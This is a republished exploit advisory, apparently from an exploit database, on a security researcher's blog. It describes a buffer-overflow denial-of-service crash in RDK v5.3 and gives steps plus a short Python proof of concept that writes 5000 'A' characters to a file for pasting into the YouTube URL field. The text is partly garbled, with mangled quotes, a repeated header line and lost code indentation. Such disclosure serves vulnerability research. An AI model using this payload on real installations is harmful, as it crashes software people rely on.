Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

RDK 5.3 Buffer Overflow

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 26
Exploit Title: RDK v5.3 - Buffer Overflow (DoS)
Discovered by: Ahmet Exploit Title: RDK v5.3 - Buffer Overflow (DoS)
Discovered by: Ahmet ?mit BAYRAM
Discovered Date: 17.04.2024
Vendor Homepage: http://www.shenturk.com
Software Link: http://www.shenturk.com/downloads/rdk-5.3-setup.rar
Tested Version: v5.3 (latest)
Tested on: Windows 10 32bit
Steps to Reproduce

Open the RDK application.
Click on the "Plus" button.
Select YouTube.
Copy the contents of poc.txt and paste it into the "YouTube URL" field.
Click Tamam to confirm.
Locate the payload from the list and double-click it.
The application should crash.

Proof of Concept (PoC)

The following script creates a poc.txt file containing a payload that
causes a buffer overflow in RDK v5.3.

#!/usr/bin/env python3

exploit = ?A? * 5000

try:
with open("poc.txt", "w") as file:
file.write(exploit)
print("POC is created")
except Exception as e:
print("POC not created:", e)